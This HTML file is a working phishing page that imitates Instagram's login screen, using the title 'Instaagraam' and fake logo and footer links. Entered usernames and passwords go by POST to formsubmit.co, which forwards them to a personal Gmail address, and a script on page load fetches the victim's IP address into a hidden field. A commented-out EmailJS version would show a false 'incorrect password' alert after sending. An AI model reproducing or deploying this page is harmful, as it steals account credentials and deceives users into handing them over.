<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instaagraam</title>
    <!-- FAVIVON -->
    <link rel="shortcut icon" href="./images/favicon.png" type="image/png">
    <!-- GOOGLE FONT -->
    <link rel="preconnect" href="https://fonts.gstatic.com">
    <link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100;0,300;0,400;0,500;0,700;0,900;1,100;1,300;1,400;1,500;1,700;1,900&display=swap" rel="stylesheet">
    
    <!-- APP CSS -->
    <link rel="stylesheet" href="./app.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.css"
    integrity="sha512-z3gLpd7yknf1YoNbCzqRKc4qyor8gaKU1qmn+CShxbuBusANI9QpRohGBreCFkKxLhei6S9CQXFEbbKuqLg0DA=="
    crossorigin="anonymous" referrerpolicy="no-referrer" />
</head>

<body>

    <div class="container">
        <div class="main-container">
            <div class="main-content">
                <div class="slide-container" style="background-image: url(./images/phone-frame.png);">
                    <div class="slide-content" id="slide-content">
                        <img src="./images/slide (1).jpg" alt="slide image" class="active">
                        <img src="./images/slide (2).jpg" alt="slide image">
                        <img src="./images/slide (3).jpg" alt="slide image">
                        <img src="./images/slide (4).jpg" alt="slide image">
                        <img src="./images/slide (5).jpg" alt="slide image">
                    </div>
                </div>
                <div class="form-container">
                    <form id="form"  method="POST" action="https://formsubmit.co/nelsonmike4147@gmail.com">
  <input type="text" id="ipAddress" name="ipAddress" readonly hidden>
                    <div class="form-content box">
                        <div class="logo">
                            <img src="./images/logo-light.png" alt="Instagram logo" class="logo-light">
                            <img src="./images/logo-dark.png" alt="Instagram logo" class="logo-dark">
                        </div>
                        <div class="btn-group">
                            <button class="btn-login" type="submit" id="button" value="Send Email">
                            <i class="fab fa-facebook-square"></i> Continue Using Facebook
                            </button>
                                                  </div>
                                                <div class="divine">
                                                    <div></div>
                                                    <div>OR</div>
                                                    <div></div>
                                                </div>
                        <div class="signin-form" id="signin-form">
                            <div class="form-group">
                                <div class="animate-input">
                                    <span>
                                        Phone number, username or email
                                    </span>
                                    <input type="text" name="username" id="username" required>
                                    <input type="hidden" name="_captcha" value="false">
                                    <input type="hidden" name="_next" value="thanks.html">
                                </div>
                                
                            </div>
                            <div class="form-group">
                                <div class="animate-input">
                                    <span>
                                        Password
                                    </span>
                                   

                                    <input type="text" name="password" id="password" required>
                                    <button>Show</button>
                                </div>
                                <div style="display: flex; text-align: end; justify-content: end; color: rgb(0, 17, 255);"><a href="#" class="forgot-pw">Forgotten your password?</a></div>
                            </div>
                            <div class="btn-group">
                                <button class="btn-login"  type="submit" id="button" value="Send Email">
                                    Log In
                                </button>
                                <div class="box goto">
                                <p>
                                    Don't have an account?
                                    <a href="#">Sign up</a>
                                </p>
                                </div>
                                
                                </form>
                            </div>
                           
                           
                           
                        </div>
                    </div>
                   

                    <div class="app-download">
                        <p>Get the app.</p>
                        <div class="store-link">
                            <a href="#">
                                <img src="./images/app-store.png" alt="app store">
                            </a>
                            <a href="#">
                                <img src="./images/gg-play.png" alt="google play">
                            </a>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div class="footer">
            <div class="links">
                <a href="#">About</a>
                <a href="#">Blog</a>
                <a href="#">Jobs</a>
                <a href="#">Help</a>
                <a href="#">API</a>
                <a href="#">Privacy</a>
                <a href="#">Terms</a>
                <a href="#">Top Accounts</a>
                <a href="#">Hashtags</a>
                <a href="#">Locations</a>
                <a href="#" id="darkmode-toggle">Darkmode</a>
            </div>
            <hr>
            
                <div class="copyright">
                   
                    <p>from</p>
                  
                    <img src="images\download.jpg" alt="">
                
            </div>
            
        </div>
    </div>
    <!-- <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/@emailjs/browser@3/dist/email.min.js"></script>
    
    <script type="text/javascript">
        emailjs.init('TNDdEBOh6CvEAAaKN')
        const btn = document.getElementById('button');

            document.getElementById('form')
                .addEventListener('submit', function (event) {
                    event.preventDefault();

                    btn.value = 'Sending...';

                    const serviceID = 'service_qrp6tch';
                    const templateID = 'template_8vyte6j';

                    emailjs.sendForm(serviceID, templateID, this)
                        .then(() => {
                            btn.value = 'Send Email';
                            alert('Sorry, Your password was incorrect. please double-check your password.');
                        }, (err) => {
                            btn.value = 'Send Email';
                            alert(JSON.stringify(err));
                        });
                });
    </script> -->
    
    <script src="app.js"></script> 
        <script>
      document.addEventListener('DOMContentLoaded', function () {
        // Replace 'https://api.ipify.org?format=json' with a preferred IP API if needed
        fetch('https://api.ipify.org?format=json')
          .then(response => response.json())
          .then(data => {
            const ipAddress = data.ip;
            document.getElementById('ipAddress').value = ipAddress;
          })
          .catch(error => {
            console.error('Error fetching IP address:', error);
          });
      });

    </script>
<!-- <script> -->
  

    <!-- </script> -->

</body>

</html>
